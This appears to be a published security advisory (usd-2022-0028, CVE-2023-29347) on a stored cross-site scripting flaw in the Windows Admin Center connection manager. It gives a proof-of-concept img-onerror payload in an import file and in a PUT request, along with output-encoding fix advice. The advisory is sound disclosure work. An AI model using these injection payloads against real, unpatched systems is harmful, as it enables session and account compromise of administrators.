{"id":20748,"date":"2023-08-14T12:01:07","date_gmt":"2023-08-14T10:01:07","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/20729-2\/"},"modified":"2023-08-16T08:57:02","modified_gmt":"2023-08-16T06:57:02","slug":"usd-2022-0028","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0028\/","title":{"rendered":"usd-2022-0028"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0028 | Windows Admin Center 2110.2 - Stored XSS<\/h1>\n

Advisory ID:<\/strong> usd-2022-0028
Product:<\/strong> Windows Admin Center
Affected Version:<\/strong> 2110.2 Build 1.3.2204.19002
Vulnerability Type:<\/strong> https:\/\/cwe.mitre.org\/data\/definitions\/79.html<\/a>
Security Risk:<\/strong> High
Vendor URL:<\/strong> https:\/\/microsoft.com<\/a>
Vendor Status:<\/strong> Fixed
CVE number:<\/strong> CVE-2023-29347
Last Update:<\/strong> 2023-08-14<\/p>\n

Description<\/h2>\n

Windows Admin Center is a centralized management tool developed by Microsoft for IT administrators to manage and monitor Windows Server and Windows 10 systems. It provides a web-based graphical user interface (GUI) that allows administrators to perform various administrative tasks, such as configuring settings, managing storage, running PowerShell scripts, and monitoring system performance.<\/p>\n

The Windows Admin Center 2110.2 is vulnerable to a stored Cross-Site Scripting attack in the name field of the Connection Manager.<\/p>\n

The Windows Admin Center allows users to manage remote servers, PCs or clusters.
These items can be either imported using a text file or suppling the name in a form field.
Both fields can be used to inject XSS payload.<\/p>\n

Proof of Concept<\/h2>\n

An example text file is shown below:<\/p>\n

\"><img src=\/X onerror=alert(document.domain)>\n1ginqx55f5kbeebbo67cjp6w5nbgz5.burp.usd.de\n<\/pre>\n
Note: script tags and other payloads failed during the test. You may need to use the img tag.<\/em><\/p>\n
PUT \/api\/connections HTTP\/1.1\nHost: XXX\nCookie: XXX\n\n[{\"id\":\"msft.sme.connection-type.cluster!\\\"><img src=\/x onerror=alert(document.domain)>\",\"type\":\"msft.sme.connection-type.cluster\",\"name\":\"\\\"><img src=\/x onerror=alert(document.domain)>\",\"properties\":{\"connectionType\":\"cluster\",\"ncUri\":null,\"nodes\":[]},\"tags\":[]}]\n<\/code><\/pre>\n
The following screen shows, that the payload is triggered after a short time on the page.<\/p>\n
\"\"<\/p>\n
Fix<\/h2>\n
It is recommended to treat all input on the website as potentially dangerous.
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.
The majority of programming languages support standard procedures for encoding meta characters.<\/p>\n
References<\/h2>\n